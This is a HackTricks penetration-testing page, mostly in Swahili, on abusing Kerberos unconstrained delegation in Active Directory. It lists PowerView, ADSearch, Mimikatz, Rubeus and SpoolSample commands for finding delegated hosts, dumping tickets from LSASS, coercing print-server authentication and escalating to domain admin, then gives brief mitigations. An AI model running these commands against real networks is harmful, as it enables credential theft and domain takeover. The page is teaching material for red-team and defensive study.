Unconstrained Delegation
Reading time: 4 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Unconstrained delegation
Hii ni kipengele ambacho Msimamizi wa Kikoa anaweza kuweka kwa Kompyuta yoyote ndani ya kikoa. Kisha, kila wakati mtumiaji anapoingia kwenye Kompyuta, nakala ya TGT ya mtumiaji huyo itakuwa inatumwa ndani ya TGS inayotolewa na DC na kuhifadhiwa kwenye kumbukumbu katika LSASS. Hivyo, ikiwa una mamlaka ya Msimamizi kwenye mashine hiyo, utaweza kuchota tiketi na kujifanya kuwa watumiaji kwenye mashine yoyote.
Hivyo ikiwa msimamizi wa kikoa anaingia ndani ya Kompyuta yenye kipengele cha "Unconstrained Delegation" kimewezeshwa, na una mamlaka ya msimamizi wa ndani kwenye mashine hiyo, utaweza kuchota tiketi na kujifanya kuwa Msimamizi wa Kikoa popote (domain privesc).
Unaweza kupata vitu vya Kompyuta vyenye sifa hii kwa kuangalia ikiwa sifa ya userAccountControl ina ADS_UF_TRUSTED_FOR_DELEGATION. Unaweza kufanya hivi kwa kutumia chujio la LDAP la ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, ambayo ndiyo inafanya powerview:
# List unconstrained computers
## Powerview
## A DCs always appear and might be useful to attack a DC from another compromised DC from a different domain (coercing the other DC to authenticate to it)
Get-DomainComputer –Unconstrained –Properties name
Get-DomainUser -LdapFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
## Access LSASS memory
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way
# Monitor logins and export new tickets
## Doens't access LSASS memory directly, but uses Windows APIs
Rubeus.exe dump
Rubeus.exe monitor /interval:10 [/filteruser:<username>] #Check every 10s for new TGTs
Load the ticket of Administrator (or victim user) in memory with Mimikatz or Rubeus for a Pass the Ticket.
More info: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
More information about Unconstrained delegation in ired.team.
Force Authentication
Ikiwa mshambuliaji anaweza kudukua kompyuta iliyo ruhusiwa kwa "Unconstrained Delegation", anaweza kudanganya Print server ku ingia moja kwa moja dhidi yake akihifadhi TGT katika kumbukumbu ya seva.
Kisha, mshambuliaji anaweza kufanya Pass the Ticket attack to impersonate akaunti ya kompyuta ya mtumiaji Print server.
Ili kufanya print server iingie dhidi ya mashine yoyote unaweza kutumia SpoolSample:
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
Ikiwa TGT inatoka kwa kiongozi wa eneo, unaweza kufanya DCSync attack na kupata hash zote kutoka kwa DC.
Maelezo zaidi kuhusu shambulio hili katika ired.team.
Pata hapa njia nyingine za kulazimisha uthibitishaji:
Force NTLM Privileged Authentication
Mitigation
- Punguza logins za DA/Admin kwa huduma maalum
- Weka "Account is sensitive and cannot be delegated" kwa akaunti zenye mamlaka.
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.